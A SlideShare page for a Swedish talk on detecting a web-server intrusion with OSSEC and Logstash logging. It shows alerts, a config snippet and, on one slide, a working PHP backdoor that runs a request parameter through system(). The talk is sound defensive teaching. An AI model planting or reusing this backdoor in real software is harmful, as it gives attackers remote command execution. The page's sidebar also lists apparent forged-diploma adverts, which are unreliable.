SlideShare a Scribd company logo

Upptäcka intrång med hjälp av loggning

Download as PPTX, PDF
Jonas Lejon
Jonas Lejon

Denna presentation visar på ett dataintrång som blivit upptäckt med hjälp av loggning. Vi använder oss av OSSEC, Logstash, Kibana och Elasticsearch.

Internet
1 of 17
Intrång upptäckt av loggning CoreSec 2016-05-19
Jonas Lejon triop.se kryptera.se jonas@triop.se @jonasl
OSSEC HIDS Notification.2013 Jun 16 23:48:29 Received From: hetzner->/var/www/logs/error.log Rule: 31421 fired (level 5) -> "PHP internal error (missing file or function).” Portion of the log(s):2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGI sent in stderr: "PHP message: PHP Fatal error: Call to undefined function includ_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
OSSEC HIDS Notification.2013 Jun 16 23:48:29 Received From: hetzner->/var/www/logs/error.log Rule: 31421 fired (level 5) -> "PHP internal error (missing file or function).” Portion of the log(s):2013/06/16 23:48:27 [error] 2252#0: *9980497 FastCGI sent in stderr: "PHP message: PHP Fatal error: Call to undefined function includ_once() in /var/www/docs/wp-content/themes/mytheme/footer.php on line 1" while reading upstream, client: 5.9.164.69, server: hetzner, request: "GET /wp-content/themes/mytheme/images/favicon.ico HTTP/1.1", upstream: "fastcgi://unix:/tmp/php5-fpm.sock:", host: "hetzner"
+
output { if [type] == "syslog" { file { message_format => "%{[message]}" path => "/ebs/syslog/logstash/%{[host]}.syslog" } }}
find /ebs/syslog/logstash/ -type f -exec ./util.sh addfile {} syslog ;
• IP-adress • Metadata
https://gist.github.com/jonaslejon <?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?> Exempel på bakdörr
Filintegritet OSSEC HIDS Notification. 2015 Jul 16 00:41:30 Received From: ds5090->syscheck Rule: 554 fired (level 7) -> "File added to the /var/www directory." Portion of the log(s): New file '/var/www/website.com/docs/president.php' added to the file system. --END OF NOTIFICATION
Tack!

Recommended

Introducing with MongoDB
Introducing with MongoDBIntroducing with MongoDB
Introducing with MongoDBMahbub Tito
 
Open web mail setup
Open web mail setupOpen web mail setup
Open web mail setup
Chacheng Oo
 
Setting ubuntu server sebagai pc router
Setting ubuntu server sebagai pc routerSetting ubuntu server sebagai pc router
Setting ubuntu server sebagai pc router
Nimrod Leon Scott Kenedy
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
n|u - The Open Security Community
 
gofortution
gofortutiongofortution
gofortution
gofortution
 
How To Install Apache, MySQL & PHP on Windows Vista
How To Install Apache, MySQL & PHP on Windows VistaHow To Install Apache, MySQL & PHP on Windows Vista
How To Install Apache, MySQL & PHP on Windows Vista
Mochamad Yusuf
 
Curl Tutorial
Curl Tutorial Curl Tutorial
Curl Tutorial
Ankireddy Polu
 
Squid proxy server
Squid proxy serverSquid proxy server
Squid proxy serverGreen Jb
 

Recommended

Introducing with MongoDB
Introducing with MongoDBIntroducing with MongoDB
Introducing with MongoDBMahbub Tito
 
Open web mail setup
Open web mail setupOpen web mail setup
Open web mail setup
Chacheng Oo
 
Setting ubuntu server sebagai pc router
Setting ubuntu server sebagai pc routerSetting ubuntu server sebagai pc router
Setting ubuntu server sebagai pc router
Nimrod Leon Scott Kenedy
 
Secure Your Wordpress
Secure Your WordpressSecure Your Wordpress
Secure Your Wordpress
n|u - The Open Security Community
 
gofortution
gofortutiongofortution
gofortution
gofortution
 
How To Install Apache, MySQL & PHP on Windows Vista
How To Install Apache, MySQL & PHP on Windows VistaHow To Install Apache, MySQL & PHP on Windows Vista
How To Install Apache, MySQL & PHP on Windows Vista
Mochamad Yusuf
 
Curl Tutorial
Curl Tutorial Curl Tutorial
Curl Tutorial
Ankireddy Polu
 
Squid proxy server
Squid proxy serverSquid proxy server
Squid proxy serverGreen Jb
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
NoNameCon
 
Software Testing World Cup 2016
Software Testing World Cup 2016Software Testing World Cup 2016
Software Testing World Cup 2016
Claire Moss
 
Modul quick debserver
Modul quick debserverModul quick debserver
Modul quick debserver
Slamet Achwandy
 
.htaccess Cheatsheet
.htaccess Cheatsheet.htaccess Cheatsheet
.htaccess Cheatsheet
Shankar Soma
 
Playing with WP-CLI (WordPress Command Line Interface)
Playing with WP-CLI (WordPress Command Line Interface)Playing with WP-CLI (WordPress Command Line Interface)
Playing with WP-CLI (WordPress Command Line Interface)
Anam Ahmed
 
Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxyLeandro Almeida
 
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid UmarPENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
Walid Umar
 
WebSockets with PHP: Mission impossible
WebSockets with PHP: Mission impossibleWebSockets with PHP: Mission impossible
WebSockets with PHP: Mission impossible
Yoan-Alexander Grigorov
 
Random numbers
Random numbersRandom numbers
Random numbersPositive Hack Days
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
fool2fish
 
Cc proxy
Cc proxyCc proxy
Cc proxyTrường Tiền
 
realtime - passado, presente e futuro
realtime - passado, presente e futurorealtime - passado, presente e futuro
realtime - passado, presente e futuro
Andrews Medina
 
ClusterDesktop how-to use the site
ClusterDesktop how-to use the siteClusterDesktop how-to use the site
ClusterDesktop how-to use the site
Emil Parashkevov
 
04 web optimization
04 web optimization04 web optimization
04 web optimizationNguyen Duc Phu
 
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologiesCe hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologies
Vi Tính Hoàng Nam
 
Server
ServerServer
Serverjdsinf
 
Governor limits
Governor limitsGovernor limits
Governor limitsmallareddy0107
 
Bypass pfsense
Bypass pfsenseBypass pfsense
Bypass pfsense
SalmenHAJJI1
 
Socket programming with php
Socket programming with phpSocket programming with php
Socket programming with phpElizabeth Smith
 
1تقرير
1تقرير1تقرير
1تقريرtech1010
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
Combell NV
 

More Related Content

What's hot

Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
NoNameCon
 
Software Testing World Cup 2016
Software Testing World Cup 2016Software Testing World Cup 2016
Software Testing World Cup 2016
Claire Moss
 
Modul quick debserver
Modul quick debserverModul quick debserver
Modul quick debserver
Slamet Achwandy
 
.htaccess Cheatsheet
.htaccess Cheatsheet.htaccess Cheatsheet
.htaccess Cheatsheet
Shankar Soma
 
Playing with WP-CLI (WordPress Command Line Interface)
Playing with WP-CLI (WordPress Command Line Interface)Playing with WP-CLI (WordPress Command Line Interface)
Playing with WP-CLI (WordPress Command Line Interface)
Anam Ahmed
 
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid UmarPENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
Walid Umar
 
WebSockets with PHP: Mission impossible
WebSockets with PHP: Mission impossibleWebSockets with PHP: Mission impossible
WebSockets with PHP: Mission impossible
Yoan-Alexander Grigorov
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
fool2fish
 
realtime - passado, presente e futuro
realtime - passado, presente e futurorealtime - passado, presente e futuro
realtime - passado, presente e futuro
Andrews Medina
 
ClusterDesktop how-to use the site
ClusterDesktop how-to use the siteClusterDesktop how-to use the site
ClusterDesktop how-to use the site
Emil Parashkevov
 
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologiesCe hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologies
Vi Tính Hoàng Nam
 
Server
ServerServer
Serverjdsinf
 
Bypass pfsense
Bypass pfsenseBypass pfsense
Bypass pfsense
SalmenHAJJI1
 
Socket programming with php
Socket programming with phpSocket programming with php
Socket programming with phpElizabeth Smith
 
1تقرير
1تقرير1تقرير
1تقريرtech1010
 

What's hot (20)

Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
 
Software Testing World Cup 2016
Software Testing World Cup 2016Software Testing World Cup 2016
Software Testing World Cup 2016
 
Modul quick debserver
Modul quick debserverModul quick debserver
Modul quick debserver
 
.htaccess Cheatsheet
.htaccess Cheatsheet.htaccess Cheatsheet
.htaccess Cheatsheet
 
Playing with WP-CLI (WordPress Command Line Interface)
Playing with WP-CLI (WordPress Command Line Interface)Playing with WP-CLI (WordPress Command Line Interface)
Playing with WP-CLI (WordPress Command Line Interface)
 
Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxy
 
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid UmarPENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
PENYELESAIAN SOAL UKK/UPK TAHUN 2018 Paket 3 oleh Walid Umar
 
WebSockets with PHP: Mission impossible
WebSockets with PHP: Mission impossibleWebSockets with PHP: Mission impossible
WebSockets with PHP: Mission impossible
 
Random numbers
Random numbersRandom numbers
Random numbers
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
 
Cc proxy
Cc proxyCc proxy
Cc proxy
 
realtime - passado, presente e futuro
realtime - passado, presente e futurorealtime - passado, presente e futuro
realtime - passado, presente e futuro
 
ClusterDesktop how-to use the site
ClusterDesktop how-to use the siteClusterDesktop how-to use the site
ClusterDesktop how-to use the site
 
04 web optimization
04 web optimization04 web optimization
04 web optimization
 
Ce hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologiesCe hv6 module 54 proxy server technologies
Ce hv6 module 54 proxy server technologies
 
Server
ServerServer
Server
 
Governor limits
Governor limitsGovernor limits
Governor limits
 
Bypass pfsense
Bypass pfsenseBypass pfsense
Bypass pfsense
 
Socket programming with php
Socket programming with phpSocket programming with php
Socket programming with php
 
1تقرير
1تقرير1تقرير
1تقرير
 

Similar to Upptäcka intrång med hjälp av loggning

Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
Combell NV
 
Foxtrot C2: A Journey of Payload Delivery
Foxtrot C2: A Journey of Payload DeliveryFoxtrot C2: A Journey of Payload Delivery
Foxtrot C2: A Journey of Payload Delivery
Dimitry Snezhkov
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
Aman Srivastava
 
Xdebug from a to x
Xdebug from a to xXdebug from a to x
Xdebug from a to x
Gennady Feldman
 
Secure PHP environment
Secure PHP environmentSecure PHP environment
Secure PHP environment
SpeedPartner GmbH
 
Deploying nginx with minimal system resources
Deploying nginx with minimal system resourcesDeploying nginx with minimal system resources
Deploying nginx with minimal system resourcesMax Ukhanov
 
CodeIgniter Lab
CodeIgniter LabCodeIgniter Lab
CodeIgniter Lab
Leo Nguyen
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
CloudLinux
 
PHP: Debugger, Profiler and more
PHP: Debugger, Profiler and morePHP: Debugger, Profiler and more
PHP: Debugger, Profiler and more
Võ Duy Tuấn
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Application Logging With Logstash
Application Logging With LogstashApplication Logging With Logstash
Application Logging With Logstash
benwaine
 
Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1
Eric Romang
 
Phone Home: A client-side error collection system
Phone Home: A client-side error collection systemPhone Home: A client-side error collection system
Phone Home: A client-side error collection system
Chris Birchall
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Jérémy Derussé
 
Pentest Expectations
Pentest ExpectationsPentest Expectations
Pentest Expectations
Ihor Uzhvenko
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
f00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 
PHP {in}security
PHP {in}securityPHP {in}security
PHP {in}security
Michael Clark
 
Php File Upload
Php File UploadPhp File Upload
Php File Uploadsaeel005
 

Similar to Upptäcka intrång med hjälp av loggning (20)

Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10Php through the eyes of a hoster: PHPNW10
Php through the eyes of a hoster: PHPNW10
 
Foxtrot C2: A Journey of Payload Delivery
Foxtrot C2: A Journey of Payload DeliveryFoxtrot C2: A Journey of Payload Delivery
Foxtrot C2: A Journey of Payload Delivery
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
 
Xdebug from a to x
Xdebug from a to xXdebug from a to x
Xdebug from a to x
 
Secure PHP environment
Secure PHP environmentSecure PHP environment
Secure PHP environment
 
Deploying nginx with minimal system resources
Deploying nginx with minimal system resourcesDeploying nginx with minimal system resources
Deploying nginx with minimal system resources
 
CodeIgniter Lab
CodeIgniter LabCodeIgniter Lab
CodeIgniter Lab
 
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OSSupercharging your PHP pages with mod_lsapi in CloudLinux OS
Supercharging your PHP pages with mod_lsapi in CloudLinux OS
 
PHP: Debugger, Profiler and more
PHP: Debugger, Profiler and morePHP: Debugger, Profiler and more
PHP: Debugger, Profiler and more
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Application Logging With Logstash
Application Logging With LogstashApplication Logging With Logstash
Application Logging With Logstash
 
Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1Metasploit Exploitation Scenarios -EN : Scenario 1
Metasploit Exploitation Scenarios -EN : Scenario 1
 
Phone Home: A client-side error collection system
Phone Home: A client-side error collection systemPhone Home: A client-side error collection system
Phone Home: A client-side error collection system
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Pentest Expectations
Pentest ExpectationsPentest Expectations
Pentest Expectations
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 
PHP {in}security
PHP {in}securityPHP {in}security
PHP {in}security
 
Php File Upload
Php File UploadPhp File Upload
Php File Upload
 

More from Jonas Lejon

Kryptobuggar 2017 12-01
Kryptobuggar 2017 12-01Kryptobuggar 2017 12-01
Kryptobuggar 2017 12-01
Jonas Lejon
 
OWASP Top 10 webbsäkerhet
OWASP Top 10 webbsäkerhetOWASP Top 10 webbsäkerhet
OWASP Top 10 webbsäkerhet
Jonas Lejon
 
Framtidens cyberangrepp - Exfiltration, Bitcoin och zero-days
Framtidens cyberangrepp - Exfiltration, Bitcoin och zero-daysFramtidens cyberangrepp - Exfiltration, Bitcoin och zero-days
Framtidens cyberangrepp - Exfiltration, Bitcoin och zero-days
Jonas Lejon
 
🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡
🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡
🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡
Jonas Lejon
 
Advanced Exfiltration Techniques
Advanced Exfiltration TechniquesAdvanced Exfiltration Techniques
Advanced Exfiltration Techniques
Jonas Lejon
 
Exfiltration av data (information)
Exfiltration av data (information)Exfiltration av data (information)
Exfiltration av data (information)
Jonas Lejon
 
WordPress prestanda
WordPress prestandaWordPress prestanda
WordPress prestanda
Jonas Lejon
 
https
httpshttps
https
Jonas Lejon
 

More from Jonas Lejon (8)

Kryptobuggar 2017 12-01
Kryptobuggar 2017 12-01Kryptobuggar 2017 12-01
Kryptobuggar 2017 12-01
 
OWASP Top 10 webbsäkerhet
OWASP Top 10 webbsäkerhetOWASP Top 10 webbsäkerhet
OWASP Top 10 webbsäkerhet
 
Framtidens cyberangrepp - Exfiltration, Bitcoin och zero-days
Framtidens cyberangrepp - Exfiltration, Bitcoin och zero-daysFramtidens cyberangrepp - Exfiltration, Bitcoin och zero-days
Framtidens cyberangrepp - Exfiltration, Bitcoin och zero-days
 
🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡
🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡
🚫 Exfiltration av data SUSEC 2016 Borås - Jonas Lejon 📡
 
Advanced Exfiltration Techniques
Advanced Exfiltration TechniquesAdvanced Exfiltration Techniques
Advanced Exfiltration Techniques
 
Exfiltration av data (information)
Exfiltration av data (information)Exfiltration av data (information)
Exfiltration av data (information)
 
WordPress prestanda
WordPress prestandaWordPress prestanda
WordPress prestanda
 
https
httpshttps
https
 

Recently uploaded

国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
Laura Szabó
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
zyfovom
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
JeyaPerumal1
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
3ipehhoa
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 

Recently uploaded (20)

国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
学位认证网(DU毕业证)迪肯大学毕业证成绩单一比一原版制作
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
